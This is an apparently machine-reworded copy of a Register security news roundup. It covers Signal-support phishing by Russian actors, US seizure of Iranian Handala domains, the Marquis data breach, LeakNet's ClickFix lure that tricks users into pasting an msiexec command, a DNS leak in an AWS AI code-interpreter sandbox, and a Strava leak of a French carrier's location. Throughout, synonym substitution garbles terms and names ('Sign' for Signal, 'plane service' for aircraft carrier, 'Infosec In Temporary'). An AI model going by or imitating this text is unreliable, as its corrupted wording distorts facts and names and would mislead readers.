Russians posing as Signal support to launch phishing raids • The Register

Infosec In Temporary Russian intelligence-affiliated events are posing as buyer assist providers on business messaging purposes resembling Sign to compromise accounts and conduct phishing assaults, the FBI and Cybersecurity and Infrastructure Safety Company (CISA) warned final Friday.

The assaults goal folks with excessive intelligence worth, like former authorities officers, navy figures, politicians, and even journalists [We’re flattered – Ed] have snared hundreds of particular person accounts, permitting the Russians to learn and ship messages, and collect information from contact lists.

The attackers ship messages advising customers of “suspicious exercise” associated to their accounts and urge clicking a hyperlink to conduct a verification course of. As soon as victims click on, the baddies join their accounts to the sufferer’s, or utterly take over the account if the consumer is daft sufficient to submit credentials or a 2FA code.

Sign stays a extremely safe option to alternate messages, however not even the very best end-to-end encryption can cease intruders if customers invite them in.

The FBI and CISA supply standard anti-phishing recommendations of their temporary concerning the assaults.

Uncle Sam seizes 4 domains used for Iranian psyops

The US Division of Justice has seized domains related to the Iran-linked group behind the cyberattack on med-tech firm Stryker.

These web sites, the feds say, have been used to incite violence and declare credit score for disrupting the US med-tech agency’s operations. The domains have been Justicehomeland[.]org, Handala-Hack.[to], Karmabelow80[.]org and Handala-Redwanted[.]to.

The assault in query hit US med-tech firm Stryker via a gap in Microsoft Intune, wiping out info on staff’ gadgets. Iranian hacktivist group Handala, thought of to be a front for the nation’s Ministry of Intelligence and Security (MOIS), claimed credit score for the Stryker assault on one of many websites, Handala-hack[.]to.

Operators of the websites additionally used them to doxx members of the Israeli Protection Forces (IDF), and to publish claims of getting stolen 851GB of confidential knowledge from the Sanzer Hasidic Jewish Group.

FBI chief Kash Patel warned in a press release: “This FBI will seek out each actor behind these cowardly loss of life threats and cyberattacks and can deliver the complete pressure of American regulation enforcement down on them.”

However somebody claiming to symbolize Handala was not impressed, posting a defiant message that states: “They could have taken down our web site, however they are going to by no means take down our spirit, our resolve, or the facility of fact.”

That “fact” apparently consists of allegations of “witchcraft ceremonies” by the Sanzer group, in accordance with the FBI’s statement, echoing age-old antisemitic myths used to justify violence in the direction of Jewish folks.

Banking providers firm warns 670,000 folks of knowledge theft

Marquis, an organization that gives providers to banks, despatched out warning notices to greater than 670,000 those who their info was stolen by a ransomware gang final August.

The letter [PDF] poses the terrifying query: “Who Are We, and Why Do We Have Your Info?”, earlier than explaining the corporate is a advertising supplier for monetary establishments.

Stolen knowledge reportedly included delicate information like Social Safety numbers, taxpayer IDs, and account information.

In an try and make issues proper, Marquis provided victims one month’s free membership to a service from Epiq Privateness Options that is meant to observe misuse of non-public info and resolve id theft. It additionally inspired victims to “stay vigilant by reviewing your account statements and credit score reviews for any unauthorized exercise over the subsequent 12 to 24 months,” as if all of us haven’t got sufficient on our plates already.

LeakNet discovers ClickFix social engineering

The LeakNet ransomware group has moved on from its standard tactic of shopping for stolen credentials and now makes use of the ClickFix social engineering rip-off, in accordance with a brand new report from safety store Reliaquest.

ClickFix, which we’ve covered before, makes use of faux messages, delivered via compromised however reliable web sites, to persuade victims to take actions resembling operating instructions that load a rootkit or different malware.

LeakNet makes use of ClickFix to serve a faux “show you aren’t a robotic” dialog that asks customers to open the Home windows Run dialog with the Win + R shortcut and paste in a command that seems to be a hyperlink to a Cloudflare Turnstile verification web page, however truly runs an msiexec command.

That command downloads and executes a cleverly disguised loader based mostly on the (reliable) Deno runtime, which then runs the unhealthy code immediately in reminiscence, serving to to disguise the assault from file-focused forensic scanning strategies.

The tactic, Reliaquest warns, may let LeakNet increase past its present hit price of about three victims per 30 days.

The AWS sandbox that is not

Safety outfit BeyondTrust Phantom Labs claims that the AWS Bedrock AgentCore code interpreter’s sandbox is not a lot of a sandbox in any respect. Though Amazon mentioned operating this service in sandbox mode blocked exterior entry totally, Phantom Labs claims that public DNS queries get via, which may let malevolent outsiders set up command-and-control channels and suck out knowledge.

Phantom Labs says it informed AWS about the issue final September via a HackerOne report, and AWS deployed a repair in November 2025 – however later rolled it again “because of different components.” The top consequence? In December, Amazon up to date its documentation to advocate clients use digital non-public cloud mode if they need full management over all inbound site visitors.

Amazon awarded the researcher a $100 present card to the AWS Gear Store, Phantom Labs says.

Strava leaks location of plane service

French newspaper Le Monde final week reported {that a} mariner aboard an plane service went for a seven-kilometer run on its deck – whereas monitoring it together with his smartwatch, which later uploaded the run to the exercise-tracking website Strava.

The plane service’s location was subsequently seen to the world, which The Register understands is a truth navies don’t wish to reveal. France’s armed forces ought to know higher, given president Emmanuel Macron’s bodyguards reportedly leaked their locations with the health app. – Simon Sharwood ®